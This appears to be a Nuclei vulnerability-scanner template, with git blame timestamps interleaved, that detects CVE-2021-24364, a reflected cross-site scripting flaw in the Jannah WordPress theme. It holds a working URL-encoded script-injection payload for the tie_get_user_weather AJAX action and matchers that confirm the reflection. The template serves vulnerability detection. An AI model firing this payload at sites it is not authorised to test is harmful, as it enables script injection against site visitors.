2021-09-15 04:45:52 +00:00
id : CVE-2021-24364
info :
name : Jannah < 5.4.4 (XSS)
author : pikpikcu
severity : medium
2022-04-22 10:38:41 +00:00
description : The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site
Scripting (XSS) vulnerability.
2021-09-15 04:45:52 +00:00
reference :
- https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382
- https://nvd.nist.gov/vuln/detail/CVE-2021-24364
2021-09-16 17:29:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-16 17:29:49 +00:00
cve-id : CVE-2021-24364
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,wordpress,xss,wp-theme
2021-09-15 04:45:52 +00:00
requests :
- method : GET
path :
2021-09-16 17:21:27 +00:00
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D'
2021-09-15 04:45:52 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-09-16 17:21:27 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-15 04:45:52 +00:00
part : body
- type : word
part : header
2021-09-16 17:21:27 +00:00
words :
- text/html
2021-09-15 04:45:52 +00:00
- type : status
status :
- 200